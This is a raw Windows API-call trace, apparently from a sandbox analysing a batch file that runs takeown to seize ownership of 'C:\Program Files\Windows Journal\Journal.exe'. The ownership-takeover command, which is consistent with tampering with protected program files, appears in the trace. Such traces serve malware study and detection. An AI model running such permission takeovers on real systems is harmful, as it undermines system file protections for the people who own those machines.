[0196.664] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0xb36) returned 0x566ac8 [0196.665] FreeEnvironmentStringsW (penv=0x565f88) returned 1 [0196.665] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0210.073] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x28ecec | out: lpExitCode=0x28ecec*=0x1f57) returned 1 [0210.074] CloseHandle (hObject=0x74) returned 1 [0210.074] _vsnwprintf (in: _Buffer=0x28ee34, _BufferCount=0x13, _Format="%08X", _ArgList=0x28ecf8 | out: _Buffer="00001F57") returned 8 [0210.074] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00001F57") returned 1 [0210.074] GetProcessHeap () returned 0x550000 [0210.074] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x566ac8 | out: hHeap=0x550000) returned 1 [0210.074] GetEnvironmentStringsW () returned 0x565f88* [0210.075] GetProcessHeap () returned 0x550000 [0210.075] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0xb5c) returned 0x568170 [0210.075] FreeEnvironmentStringsW (penv=0x565f88) returned 1 [0210.075] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0210.075] GetProcessHeap () returned 0x550000 [0210.075] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x568170 | out: hHeap=0x550000) returned 1 [0210.075] GetEnvironmentStringsW () returned 0x565f88* [0210.075] GetProcessHeap () returned 0x550000 [0210.075] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0xb5c) returned 0x568170 [0210.075] FreeEnvironmentStringsW (penv=0x565f88) returned 1 [0210.075] GetProcessHeap () returned 0x550000 [0210.075] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x550db8 | out: hHeap=0x550000) returned 1 [0210.075] DeleteProcThreadAttributeList (in: lpAttributeList=0x28ed50 | out: lpAttributeList=0x28ed50) [0210.075] _get_osfhandle (_FileHandle=1) returned 0x7 [0210.075] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0210.075] _get_osfhandle (_FileHandle=1) returned 0x7 [0210.075] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0210.076] _get_osfhandle (_FileHandle=0) returned 0x3 [0210.076] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0210.076] SetConsoleInputExeNameW () returned 0x1 [0210.076] GetConsoleOutputCP () returned 0x1b5 [0210.076] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0210.076] SetThreadUILanguage (LangId=0x0) returned 0x409 [0210.077] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x28f56c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0210.078] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0210.078] _get_osfhandle (_FileHandle=3) returned 0x74 [0210.078] SetFilePointer (in: hFile=0x74, lDistanceToMove=32, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0210.078] GetProcessHeap () returned 0x550000 [0210.078] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x564af0 | out: hHeap=0x550000) returned 1 [0210.078] GetProcessHeap () returned 0x550000 [0210.078] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x5649c0 | out: hHeap=0x550000) returned 1 [0210.078] GetProcessHeap () returned 0x550000 [0210.078] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x564898 | out: hHeap=0x550000) returned 1 [0210.078] GetProcessHeap () returned 0x550000 [0210.078] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x564830 | out: hHeap=0x550000) returned 1 [0210.078] GetProcessHeap () returned 0x550000 [0210.078] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x564770 | out: hHeap=0x550000) returned 1 [0210.078] GetProcessHeap () returned 0x550000 [0210.078] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x564558 | out: hHeap=0x550000) returned 1 [0210.078] GetProcessHeap () returned 0x550000 [0210.078] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x5644d8 | out: hHeap=0x550000) returned 1 [0210.078] GetProcessHeap () returned 0x550000 [0210.078] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x5643a8 | out: hHeap=0x550000) returned 1 [0210.078] GetProcessHeap () returned 0x550000 [0210.078] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x564280 | out: hHeap=0x550000) returned 1 [0210.078] GetProcessHeap () returned 0x550000 [0210.078] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x564218 | out: hHeap=0x550000) returned 1 [0210.078] GetProcessHeap () returned 0x550000 [0210.078] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x564168 | out: hHeap=0x550000) returned 1 [0210.079] GetProcessHeap () returned 0x550000 [0210.079] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x563670 | out: hHeap=0x550000) returned 1 [0210.079] GetProcessHeap () returned 0x550000 [0210.079] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x551220 | out: hHeap=0x550000) returned 1 [0210.079] _get_osfhandle (_FileHandle=3) returned 0x74 [0210.079] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0210.079] ReadFile (in: hFile=0x74, lpBuffer=0x49dc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x28f550, lpOverlapped=0x0 | out: lpBuffer=0x49dc6640*, lpNumberOfBytesRead=0x28f550*=0xc2, lpOverlapped=0x0) returned 1 [0210.079] SetFilePointer (in: hFile=0x74, lDistanceToMove=47, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0210.079] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49dc6640, cbMultiByte=15, lpWideCharStr=0x49dcc640, cchWideChar=8191 | out: lpWideCharStr="takeown /F %1\r\n%USERNAME%:F /C\r\n") returned 15 [0210.080] _get_osfhandle (_FileHandle=3) returned 0x74 [0210.080] GetFileType (hFile=0x74) returned 0x1 [0210.080] _get_osfhandle (_FileHandle=3) returned 0x74 [0210.080] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0210.080] GetProcessHeap () returned 0x550000 [0210.080] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x400a) returned 0x574b00 [0210.080] GetProcessHeap () returned 0x550000 [0210.080] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x574b00 | out: hHeap=0x550000) returned 1 [0210.083] _tell (_FileHandle=3) returned 47 [0210.083] _close (_FileHandle=3) returned 0 [0210.083] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x28f324 | out: _Buffer="\r\n") returned 2 [0210.083] _get_osfhandle (_FileHandle=1) returned 0x7 [0210.083] GetFileType (hFile=0x7) returned 0x2 [0210.084] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0210.084] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f2e4 | out: lpMode=0x28f2e4) returned 1 [0210.084] _get_osfhandle (_FileHandle=1) returned 0x7 [0210.084] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x28f310, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x28f310*=0x2) returned 1 [0211.571] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0211.571] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0211.572] _vsnwprintf (in: _Buffer=0x49dc5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x28f320 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0211.572] _vsnwprintf (in: _Buffer=0x49dc5e8a, _BufferCount=0x3d9, _Format="%c", _ArgList=0x28f320 | out: _Buffer=">") returned 1 [0211.572] _get_osfhandle (_FileHandle=1) returned 0x7 [0211.572] GetFileType (hFile=0x7) returned 0x2 [0211.573] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0211.573] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f2e8 | out: lpMode=0x28f2e8) returned 1 [0211.574] _get_osfhandle (_FileHandle=1) returned 0x7 [0211.574] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dc5e40*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x28f314, lpReserved=0x0 | out: lpBuffer=0x49dc5e40*, lpNumberOfCharsWritten=0x28f314*=0x26) returned 1 [0211.574] _get_osfhandle (_FileHandle=1) returned 0x7 [0211.574] GetFileType (hFile=0x7) returned 0x2 [0211.575] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0211.575] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f56c | out: lpMode=0x28f56c) returned 1 [0211.575] _get_osfhandle (_FileHandle=1) returned 0x7 [0211.576] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x563678*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x28f598, lpReserved=0x0 | out: lpBuffer=0x563678*, lpNumberOfCharsWritten=0x28f598*=0x7) returned 1 [0211.576] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x28f5a4 | out: _Buffer=" /F \"C:\\Program Files\\Windows Journal\\Journal.exe\" ") returned 51 [0211.576] _get_osfhandle (_FileHandle=1) returned 0x7 [0211.576] GetFileType (hFile=0x7) returned 0x2 [0211.577] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0211.577] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f564 | out: lpMode=0x28f564) returned 1 [0211.577] _get_osfhandle (_FileHandle=1) returned 0x7 [0211.578] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x33, lpNumberOfCharsWritten=0x28f590, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x28f590*=0x33) returned 1 [0211.580] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x28f5c4 | out: _Buffer="\r\n") returned 2 [0211.580] _get_osfhandle (_FileHandle=1) returned 0x7 [0211.580] GetFileType (hFile=0x7) returned 0x2 [0211.581] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0211.581] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f584 | out: lpMode=0x28f584) returned 1 [0211.582] _get_osfhandle (_FileHandle=1) returned 0x7 [0211.582] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x28f5b0, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x28f5b0*=0x2) returned 1 [0211.584] _wcsicmp (_String1="takeown", _String2="DIR") returned 16 [0211.584] _wcsicmp (_String1="takeown", _String2="ERASE") returned 15 [0211.585] _wcsicmp (_String1="takeown", _String2="DEL") returned 16 [0211.585] _wcsicmp (_String1="takeown", _String2="TYPE") returned -24 [0211.585] _wcsicmp (_String1="takeown", _String2="COPY") returned 17 [0211.585] _wcsicmp (_String1="takeown", _String2="CD") returned 17 [0211.585] _wcsicmp (_String1="takeown", _String2="CHDIR") returned 17 [0211.585] _wcsicmp (_String1="takeown", _String2="RENAME") returned 2 [0211.585] _wcsicmp (_String1="takeown", _String2="REN") returned 2 [0211.585] _wcsicmp (_String1="takeown", _String2="ECHO") returned 15 [0211.585] _wcsicmp (_String1="takeown", _String2="SET") returned 1 [0211.585] _wcsicmp (_String1="takeown", _String2="PAUSE") returned 4 [0211.585] _wcsicmp (_String1="takeown", _String2="DATE") returned 16 [0211.585] _wcsicmp (_String1="takeown", _String2="TIME") returned -8 [0211.585] _wcsicmp (_String1="takeown", _String2="PROMPT") returned 4 [0211.585] _wcsicmp (_String1="takeown", _String2="MD") returned 7 [0211.586] _wcsicmp (_String1="takeown", _String2="MKDIR") returned 7 [0211.586] _wcsicmp (_String1="takeown", _String2="RD") returned 2 [0211.586] _wcsicmp (_String1="takeown", _String2="RMDIR") returned 2 [0211.586] _wcsicmp (_String1="takeown", _String2="PATH") returned 4 [0211.586] _wcsicmp (_String1="takeown", _String2="GOTO") returned 13 [0211.586] _wcsicmp (_String1="takeown", _String2="SHIFT") returned 1 [0211.586] _wcsicmp (_String1="takeown", _String2="CLS") returned 17 [0211.586] _wcsicmp (_String1="takeown", _String2="CALL") returned 17 [0211.586] _wcsicmp (_String1="takeown", _String2="VERIFY") returned -2 [0211.586] _wcsicmp (_String1="takeown", _String2="VER") returned -2 [0211.586] _wcsicmp (_String1="takeown", _String2="VOL") returned -2 [0211.587] _wcsicmp (_String1="takeown", _String2="EXIT") returned 15 [0211.587] _wcsicmp (_String1="takeown", _String2="SETLOCAL") returned 1 [0211.587] _wcsicmp (_String1="takeown", _String2="ENDLOCAL") returned 15 [0211.587] _wcsicmp (_String1="takeown", _String2="TITLE") returned -8 [0211.587] _wcsicmp (_String1="takeown", _String2="START") returned 1 [0211.587] _wcsicmp (_String1="takeown", _String2="DPATH") returned 16 [0211.587] _wcsicmp (_String1="takeown", _String2="KEYS") returned 9 [0211.587] _wcsicmp (_String1="takeown", _String2="MOVE") returned 7 [0211.587] _wcsicmp (_String1="takeown", _String2="PUSHD") returned 4 [0211.587] _wcsicmp (_String1="takeown", _String2="POPD") returned 4 [0211.587] _wcsicmp (_String1="takeown", _String2="ASSOC") returned 19 [0211.587] _wcsicmp (_String1="takeown", _String2="FTYPE") returned 14 [0211.588] _wcsicmp (_String1="takeown", _String2="BREAK") returned 18 [0211.588] _wcsicmp (_String1="takeown", _String2="COLOR") returned 17 [0211.588] _wcsicmp (_String1="takeown", _String2="MKLINK") returned 7 [0211.589] GetConsoleTitleW (in: lpConsoleTitle=0x28f134, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0211.590] GetConsoleTitleW (in: lpConsoleTitle=0x28eec8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0211.590] InitializeProcThreadAttributeList (in: lpAttributeList=0x28ed50, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x28ee18 | out: lpAttributeList=0x28ed50, lpSize=0x28ee18) returned 1 [0211.590] UpdateProcThreadAttribute (in: lpAttributeList=0x28ed50, dwFlags=0x0, Attribute=0x60001, lpValue=0x28ee10, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x28ed50, lpPreviousValue=0x0) returned 1 [0211.590] GetStartupInfoW (in: lpStartupInfo=0x28ed0c | out: lpStartupInfo=0x28ed0c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0211.609] CloseHandle (hObject=0x74) returned 1 [0211.609] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0211.609] GetProcessHeap () returned 0x550000 [0211.609] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x568170 | out: hHeap=0x550000) returned 1 [0211.609] GetEnvironmentStringsW () returned 0x565f88* [0211.609] GetProcessHeap () returned 0x550000 [0211.609] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0xb5c) returned 0x568170 [0211.610] FreeEnvironmentStringsW (penv=0x565f88) returned 1 [0211.610] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0218.719] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x28ecec | out: lpExitCode=0x28ecec*=0x0) returned 1 [0218.720] CloseHandle (hObject=0x78) returned 1 [0218.720] _vsnwprintf (in: _Buffer=0x28ee34, _BufferCount=0x13, _Format="%08X", _ArgList=0x28ecf8 | out: _Buffer="00000000") returned 8 [0218.720] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0218.720] GetProcessHeap () returned 0x550000 [0218.720] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x568170 | out: hHeap=0x550000) returned 1 [0218.720] GetEnvironmentStringsW () returned 0x565f88* [0218.720] GetProcessHeap () returned 0x550000 [0218.720] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0xb5c) returned 0x568170 [0218.720] FreeEnvironmentStringsW (penv=0x565f88) returned 1 [0218.720] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0218.721] GetProcessHeap () returned 0x550000 [0218.721] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x568170 | out: hHeap=0x550000) returned 1 [0218.721] GetEnvironmentStringsW () returned 0x565f88* [0218.721] GetProcessHeap () returned 0x550000 [0218.721] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0xb5c) returned 0x568170 [0218.721] FreeEnvironmentStringsW (penv=0x565f88) returned 1 [0218.721] GetProcessHeap () returned 0x550000 [0218.721] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x550db8 | out: hHeap=0x550000) returned 1 [0218.721] DeleteProcThreadAttributeList (in: lpAttributeList=0x28ed50 | out: lpAttributeList=0x28ed50) [0218.721] _get_osfhandle (_FileHandle=1) returned 0x7 [0218.721] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0218.722] _get_osfhandle (_FileHandle=1) returned 0x7 [0218.722] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0218.722] _get_osfhandle (_FileHandle=0) returned 0x3 [0218.722] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0218.723] SetConsoleInputExeNameW () returned 0x1 [0218.723] GetConsoleOutputCP () returned 0x1b5 [0218.723] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0218.723] SetThreadUILanguage (LangId=0x0) returned 0x409 [0218.723] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x28f56c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0218.724] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0218.724] _get_osfhandle (_FileHandle=3) returned 0x78 [0218.724] SetFilePointer (in: hFile=0x78, lDistanceToMove=47, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0218.724] GetProcessHeap () returned 0x550000 [0218.725] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x564a20 | out: hHeap=0x550000) returned 1 [0218.725] GetProcessHeap () returned 0x550000 [0218.725] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x5648f0 | out: hHeap=0x550000) returned 1 [0218.725] GetProcessHeap () returned 0x550000 [0218.725] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x5647c8 | out: hHeap=0x550000) returned 1 [0218.725] GetProcessHeap () returned 0x550000 [0218.725] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x564c98 | out: hHeap=0x550000) returned 1 [0218.725] GetProcessHeap () returned 0x550000 [0218.725] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x564740 | out: hHeap=0x550000) returned 1 [0218.725] GetProcessHeap () returned 0x550000 [0218.725] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x564528 | out: hHeap=0x550000) returned 1 [0218.725] GetProcessHeap () returned 0x550000 [0218.725] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x5644a8 | out: hHeap=0x550000) returned 1 [0218.725] GetProcessHeap () returned 0x550000 [0218.725] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x564378 | out: hHeap=0x550000) returned 1 [0218.725] GetProcessHeap () returned 0x550000 [0218.725] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x564250 | out: hHeap=0x550000) returned 1 [0218.725] GetProcessHeap () returned 0x550000 [0218.725] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x5641e0 | out: hHeap=0x550000) returned 1 [0218.725] GetProcessHeap () returned 0x550000 [0218.726] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x564168 | out: hHeap=0x550000) returned 1 [0218.726] GetProcessHeap () returned 0x550000 [0218.726] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x563670 | out: hHeap=0x550000) returned 1 [0218.726] GetProcessHeap () returned 0x550000 [0218.726] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x551220 | out: hHeap=0x550000) returned 1 [0218.726] _get_osfhandle (_FileHandle=3) returned 0x78 [0218.726] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0218.726] ReadFile (in: hFile=0x78, lpBuffer=0x49dc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x28f550, lpOverlapped=0x0 | out: lpBuffer=0x49dc6640*, lpNumberOfBytesRead=0x28f550*=0xb3, lpOverlapped=0x0) returned 1 [0218.727] SetFilePointer (in: hFile=0x78, lDistanceToMove=63, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0218.727] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49dc6640, cbMultiByte=16, lpWideCharStr=0x49dcc640, cchWideChar=8191 | out: lpWideCharStr="set FN=\"%~nx1\"\r\nUSERNAME%:F /C\r\n") returned 16 [0218.728] _get_osfhandle (_FileHandle=3) returned 0x78 [0218.728] GetFileType (hFile=0x78) returned 0x1 [0218.729] _get_osfhandle (_FileHandle=3) returned 0x78 [0218.729] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0218.729] GetProcessHeap () returned 0x550000 [0218.729] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x400a) returned 0x574b00 [0218.730] GetProcessHeap () returned 0x550000 [0218.730] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x64) returned 0x551220 [0218.730] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Journal\\Journal.exe", nBufferLength=0x208, lpBuffer=0x28ece0, lpFilePart=0x28ecd8 | out: lpBuffer="C:\\Program Files\\Windows Journal\\Journal.exe", lpFilePart=0x28ecd8*="Journal.exe") returned 0x2c [0218.730] FindFirstFileW (in: lpFileName="C:\\Program Files", lpFindFileData=0x28e9f4 | out: lpFindFileData=0x28e9f4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x41dc500, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x41dc500, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 0x564168 [0218.730] FindClose (in: hFindFile=0x564168 | out: hFindFile=0x564168) returned 1 [0218.730] _wcsnicmp (_String1="PROGRA~1", _String2="Program Files", _MaxCount=0xd) returned 17 [0218.730] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Journal", lpFindFileData=0x28e9f4 | out: lpFindFileData=0x28e9f4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e177d26, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xdae682e0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdae682e0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Journal", cAlternateFileName="WI0FCF~1")) returned 0x564168 [0218.730] FindClose (in: hFindFile=0x564168 | out: hFindFile=0x564168) returned 1 [0218.731] _wcsnicmp (_String1="WI0FCF~1", _String2="Windows Journal", _MaxCount=0xf) returned -62 [0218.731] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Journal\\Journal.exe", lpFindFileData=0x28e9f4 | out: lpFindFileData=0x28e9f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb1a4bf5a, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb1a4bf5a, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb1abe37b, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x210600, dwReserved0=0x0, dwReserved1=0x0, cFileName="Journal.exe", cAlternateFileName="")) returned 0x564168 [0218.731] FindClose (in: hFindFile=0x564168 | out: hFindFile=0x564168) returned 1 [0218.731] GetProcessHeap () returned 0x550000 [0218.731] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x20) returned 0x565840 [0218.731] GetProcessHeap () returned 0x550000 [0218.731] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x574b00 | out: hHeap=0x550000) returned 1 [0218.734] _tell (_FileHandle=3) returned 63 [0218.734] _close (_FileHandle=3) returned 0 [0218.734] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x28f324 | out: _Buffer="\r\n") returned 2 [0218.734] _get_osfhandle (_FileHandle=1) returned 0x7 [0218.734] GetFileType (hFile=0x7) returned 0x2 [0218.736] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0218.736] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f2e4 | out: lpMode=0x28f2e4) returned 1 [0218.736] _get_osfhandle (_FileHandle=1) returned 0x7 [0218.736] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x28f310, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x28f310*=0x2) returned 1 [0219.514] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0219.514] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0219.514] _vsnwprintf (in: _Buffer=0x49dc5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x28f320 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0219.514] _vsnwprintf (in: _Buffer=0x49dc5e8a, _BufferCount=0x3d9, _Format="%c", _ArgList=0x28f320 | out: _Buffer=">") returned 1 [0219.515] _get_osfhandle (_FileHandle=1) returned 0x7 [0219.515] GetFileType (hFile=0x7) returned 0x2 [0219.515] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0219.515] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f2e8 | out: lpMode=0x28f2e8) returned 1 [0219.515] _get_osfhandle (_FileHandle=1) returned 0x7 [0219.515] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dc5e40*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x28f314, lpReserved=0x0 | out: lpBuffer=0x49dc5e40*, lpNumberOfCharsWritten=0x28f314*=0x26) returned 1 [0219.516] _get_osfhandle (_FileHandle=1) returned 0x7 [0219.516] GetFileType (hFile=0x7) returned 